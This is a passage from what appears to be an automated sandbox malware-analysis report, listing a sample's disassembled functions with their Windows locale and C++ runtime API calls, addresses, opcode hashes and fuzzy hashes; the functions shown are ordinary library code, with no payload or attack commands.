                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast$InfoLocale
                                                    • String ID:
                                                    • API String ID: 3736152602-0
                                                    • Opcode ID: 641ba499a7c4c97464ae85d166f75f3f1ec357e5af45048059b6854cf2bfd321
                                                    • Instruction ID: 095e0637d42884df2aa044117ec3c98d6829a211f7d81b4ab3c3003473571991
                                                    • Opcode Fuzzy Hash: 641ba499a7c4c97464ae85d166f75f3f1ec357e5af45048059b6854cf2bfd321
                                                    • Instruction Fuzzy Hash: 82219871610246ABDB28AB25DC81ABB73A8EF44318F20407DFD15D7141EB74DE549B58
                                                    Function 00C801F9 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00C76730: GetLastError.KERNEL32(?,00000008,00C7964C), ref: 00C76734
                                                      • Part of subcall function 00C76730: SetLastError.KERNEL32(00000000,00000001,00000005,000000FF), ref: 00C767D6
                                                    • EnumSystemLocalesW.KERNEL32(00C8031F,00000001,00000000,?,-00000050,?,00C80950,00000000,?,?,?,00000055,?), ref: 00C8026B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                    • String ID:
                                                    • API String ID: 2417226690-0
                                                    • Opcode ID: 2439eb6cfdcd3d9ee2cf88ab9f710de09a2df7b9f56679fd1ee623a5b0b87be6
                                                    • Instruction ID: 2b0c208ff44eaaafb0150ac4575f1cfe996402763803f8f10abd278911e6b98e
                                                    • Opcode Fuzzy Hash: 2439eb6cfdcd3d9ee2cf88ab9f710de09a2df7b9f56679fd1ee623a5b0b87be6
                                                    • Instruction Fuzzy Hash: AE11253A6007055FDB28AF39C8A56BAB792FF8035CF28442CE95687A41D7B1B946CB40
                                                    Function 00C807A1 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00C76730: GetLastError.KERNEL32(?,00000008,00C7964C), ref: 00C76734
                                                      • Part of subcall function 00C76730: SetLastError.KERNEL32(00000000,00000001,00000005,000000FF), ref: 00C767D6
                                                    • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00C8061C,00000000,00000000,?), ref: 00C807CD
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast$InfoLocale
                                                    • String ID:
                                                    • API String ID: 3736152602-0
                                                    • Opcode ID: 29fe18177169b69534cc90592cbf8fa4c96971225aadbce2832626c7087e5639
                                                    • Instruction ID: dfe301e69a7a0f7e975dac36e17976dd1cbc9685af46fdfd2bece55385d0c79e
                                                    • Opcode Fuzzy Hash: 29fe18177169b69534cc90592cbf8fa4c96971225aadbce2832626c7087e5639
                                                    • Instruction Fuzzy Hash: 66F0F932A401116FDB6866258C497BA7758EF4075CF244428EC16A3180EA70FE85D7D4
                                                    Function 00C80107 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00C76730: GetLastError.KERNEL32(?,00000008,00C7964C), ref: 00C76734
                                                      • Part of subcall function 00C76730: SetLastError.KERNEL32(00000000,00000001,00000005,000000FF), ref: 00C767D6
                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00C8015B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast$InfoLocale
                                                    • String ID: utf8
                                                    • API String ID: 3736152602-905460609
                                                    • Opcode ID: 7d65f1963b56fdab48da54c9935caad026385f1ada9b39dbd56a3613cbc5edaa
                                                    • Instruction ID: 23f8b6a04a56307d3f7227026cf1e63df12b026ed02186977cef97ce7a51f1c2
                                                    • Opcode Fuzzy Hash: 7d65f1963b56fdab48da54c9935caad026385f1ada9b39dbd56a3613cbc5edaa
                                                    • Instruction Fuzzy Hash: F2F02232610105ABCB18AB74DC8AFBF33ECDB44328F100179F516D7281EE34AD099754
                                                    Function 00C80294 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00C76730: GetLastError.KERNEL32(?,00000008,00C7964C), ref: 00C76734
                                                      • Part of subcall function 00C76730: SetLastError.KERNEL32(00000000,00000001,00000005,000000FF), ref: 00C767D6
                                                    • EnumSystemLocalesW.KERNEL32(00C80572,00000001,?,?,-00000050,?,00C80914,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00C802DE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                    • String ID:
                                                    • API String ID: 2417226690-0
                                                    • Opcode ID: 54d599befb70f21f045937407964ce639a2bd37cb0838417a542cb606e57543d
                                                    • Instruction ID: 733e3fdb21c68e97f33b1e850d38c1c2a2872cb2d0943353a00256fbddf985b8
                                                    • Opcode Fuzzy Hash: 54d599befb70f21f045937407964ce639a2bd37cb0838417a542cb606e57543d
                                                    • Instruction Fuzzy Hash: 70F0F6362003045FDB246F39D886A7A7B91FF8176CF25842CF9458BA90CAB19D46DB58
                                                    Function 00C7888C Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00C70829: EnterCriticalSection.KERNEL32(-00CC99FF,?,00C75DB6,00000000,00C926F0,0000000C,00C75D7D,?,?,00C77432,?,?,00C768CE,00000001,00000364,00000001), ref: 00C70838
                                                    • EnumSystemLocalesW.KERNEL32(00C7887F,00000001,00C92810,0000000C,00C78CEE,00000000), ref: 00C788C4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CriticalEnterEnumLocalesSectionSystem
                                                    • String ID:
                                                    • API String ID: 1272433827-0
                                                    • Opcode ID: b60129c27673f47d6a96e0a2e9890eef1d8558e275ef5c8e8ae727711fa9326f
                                                    • Instruction ID: a5b63c6b001236b70e205a971daaf4653694bb9ea1088f537f05dee4069e6e84
                                                    • Opcode Fuzzy Hash: b60129c27673f47d6a96e0a2e9890eef1d8558e275ef5c8e8ae727711fa9326f
                                                    • Instruction Fuzzy Hash: 8DF04972A50204DFDB10DFA8E84AB9C77B0FB04721F10856AF414DB2E1CB7559049F85
                                                    Function 00C801AE Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00C76730: GetLastError.KERNEL32(?,00000008,00C7964C), ref: 00C76734
                                                      • Part of subcall function 00C76730: SetLastError.KERNEL32(00000000,00000001,00000005,000000FF), ref: 00C767D6
                                                    • EnumSystemLocalesW.KERNEL32(00C80107,00000001,?,?,?,00C80972,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00C801E5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                    • String ID:
                                                    • API String ID: 2417226690-0
                                                    • Opcode ID: a94ed47a583237dd912e848b9fe470d98b1df15e7f3abbfbabf343551e988432
                                                    • Instruction ID: 8ea5ed881c5e0fc38091eb3de0d8783f990d170872e6f0385040c772417dd5db
                                                    • Opcode Fuzzy Hash: a94ed47a583237dd912e848b9fe470d98b1df15e7f3abbfbabf343551e988432
                                                    • Instruction Fuzzy Hash: BFF0553A30024497CB04AF39CC49B6E7F90FFC1728F564058EA098B680CA719947C794
                                                    Function 00C78DF2 Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00C75921,?,20001004,00000000,00000002,?,?,00C74F23), ref: 00C78E26
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: InfoLocale
                                                    • String ID:
                                                    • API String ID: 2299586839-0
                                                    • Opcode ID: 735fe9505a616dccc9399202246d045d90fe6dc51b924a032245db8cc6735abc
                                                    • Instruction ID: 911969d075d24fac5bffca92181b05505826ffd1216c71536c8b8a49322fd6f5
                                                    • Opcode Fuzzy Hash: 735fe9505a616dccc9399202246d045d90fe6dc51b924a032245db8cc6735abc
                                                    • Instruction Fuzzy Hash: 3DE04F35580218BBCF122F61DC0DBAF7E16EF44760F048010FE1966121CF318D25AB95
                                                    Function 00C69A96 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_00009AA2,00C690D8), ref: 00C69A9B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled
                                                    • String ID:
                                                    • API String ID: 3192549508-0
                                                    • Opcode ID: d0c0b73dd17d43230cba8db38528de88b7b910a122d3f4fa4b55ee767b799904
                                                    • Instruction ID: 25bfb19cb10602884235b5460eaff6a49470db117e1f262d2b894b13d70e0e49
                                                    • Opcode Fuzzy Hash: d0c0b73dd17d43230cba8db38528de88b7b910a122d3f4fa4b55ee767b799904
                                                    • Instruction Fuzzy Hash:
                                                    Function 00C80AD2 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: HeapProcess
                                                    • String ID:
                                                    • API String ID: 54951025-0
                                                    • Opcode ID: 7650dc72756be1ead1ade078943ab4f13f1ef97e825b5399bf7c4c58561f91d2
                                                    • Instruction ID: 2c2f7df49d218f9ff5d258c538528a2b89ce6bb5b257047ff9c35446a74d3bad
                                                    • Opcode Fuzzy Hash: 7650dc72756be1ead1ade078943ab4f13f1ef97e825b5399bf7c4c58561f91d2
                                                    • Instruction Fuzzy Hash: 14A02230A02200CF8300CF30EF0C30C3AE8BA002E830280A8E003C32B0EF388008AB03
                                                    Function 00C64430 Relevance: .4, Instructions: 363COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0a0a1a9af42e0cfda2b61175d80cac1fe488ea7ef7ffd30f744997269cb1d313
                                                    • Instruction ID: bc4441484522be59e77ede9d37f1f29f238cfb10306121877b52e71aa9914ef3
                                                    • Opcode Fuzzy Hash: 0a0a1a9af42e0cfda2b61175d80cac1fe488ea7ef7ffd30f744997269cb1d313
                                                    • Instruction Fuzzy Hash: DAD1BD729087419BC329DF28C881A2FFBE5FFC9714F444A1DF999A7211D730EA449B92
                                                    Function 00C790F6 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 23ebd0bd5e6436c6e2895a3075ff04c1db8902bf7fd9e8bc258d8b36fe32f176
                                                    • Instruction ID: 3af2db1c761527683cb5987994c56d9ef41d0e7cee7f3dd47a872440a30f5cb5
                                                    • Opcode Fuzzy Hash: 23ebd0bd5e6436c6e2895a3075ff04c1db8902bf7fd9e8bc258d8b36fe32f176
                                                    • Instruction Fuzzy Hash: F1E08C72A11228EBCB14DB88C909D8EF3FCEB48B40B518496F605D3200C670DE00D7D0
                                                    Function 00C7447C Relevance: .0, Instructions: 12COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c9b5b20063a14d7e0b548af78489920c464144fa39d9f7053c57937d3e1c4aeb
                                                    • Instruction ID: 1f57e5785ce5f496428d05520ef6a52bc4331b2a85493c79f99405323866a2fd
                                                    • Opcode Fuzzy Hash: c9b5b20063a14d7e0b548af78489920c464144fa39d9f7053c57937d3e1c4aeb
                                                    • Instruction Fuzzy Hash: B1C08C38000E8046CE2DCD1082F53B53355F391782F80488CD41B0B642C62E9E83F600
                                                    Function 00C62260 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 144COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00C62275
                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00C6228F
                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00C622B0
                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00C62308
                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00C6234D
                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00C6239E
                                                    • __Getctype.LIBCPMT ref: 00C623B5
                                                    • std::_Facet_Register.LIBCPMT ref: 00C623DF
                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00C623F8
                                                      • Part of subcall function 00C65B7A: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00C65B86
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeLocinfo::_Locinfo_ctorRegisterstd::invalid_argument::invalid_argument
                                                    • String ID: bad locale name
                                                    • API String ID: 2137871723-1405518554
                                                    • Opcode ID: 66faf9b9ac28624fc79d685d03c6bf65b0e5c6e1f7da90ba6b11c18f6e077779
                                                    • Instruction ID: b00f7b781e62c09508b7922a80d78236948ec78177bbfeabb6a2de3851e8c8e4
                                                    • Opcode Fuzzy Hash: 66faf9b9ac28624fc79d685d03c6bf65b0e5c6e1f7da90ba6b11c18f6e077779
                                                    • Instruction Fuzzy Hash: 36419A72508B408FC331DF58C8C0B5AB7E4EF91720F15096CE8949B362DB35EA4ADB92
                                                    Function 00C62420 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 143COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00C62435
                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00C6244F
                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00C62470
                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00C624CB
                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00C62513
                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00C62571
                                                    • __Getctype.LIBCPMT ref: 00C62588
                                                    • std::_Facet_Register.LIBCPMT ref: 00C625DB
                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00C625F4
                                                      • Part of subcall function 00C65B7A: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00C65B86
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeLocinfo::_Locinfo_ctorRegisterstd::invalid_argument::invalid_argument
                                                    • String ID: bad locale name
                                                    • API String ID: 2137871723-1405518554
                                                    • Opcode ID: 2f70f01c4c682b84e157f25140edc2caa6524262e314c5a5ed15f905045c83fe
                                                    • Instruction ID: da957d8078872453055d66e1ab9cab8755936a33a95c3f8b49283523169c35f8
                                                    • Opcode Fuzzy Hash: 2f70f01c4c682b84e157f25140edc2caa6524262e314c5a5ed15f905045c83fe
                                                    • Instruction Fuzzy Hash: 9251B371504B50CFC731DF68C880B6AB7E0FF94710F25495DE9999B222EB34E985CB92
                                                    Function 00C62610 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 132COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00C62622
                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00C6263F
                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00C62660
                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00C626BB
                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00C626FC
                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00C6273F
                                                    • std::_Facet_Register.LIBCPMT ref: 00C62768
                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00C62781
                                                      • Part of subcall function 00C65B7A: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00C65B86
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2087215980.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                    • Associated: 00000000.00000002.2087198453.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087240856.0000000000C88000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000C94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087255940.0000000000CC7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2087296795.0000000000CCB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_c60000_56bDgH9sMQ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Locinfo::_Locinfo_ctorRegisterstd::invalid_argument::invalid_argument
                                                    • String ID: bad locale name
                                                    • API String ID: 3096327801-1405518554
                                                    • Opcode ID: a1d647830a22bdf2039a418ce4630a00b78d7c2347731da26d1f880ae6fd39f4
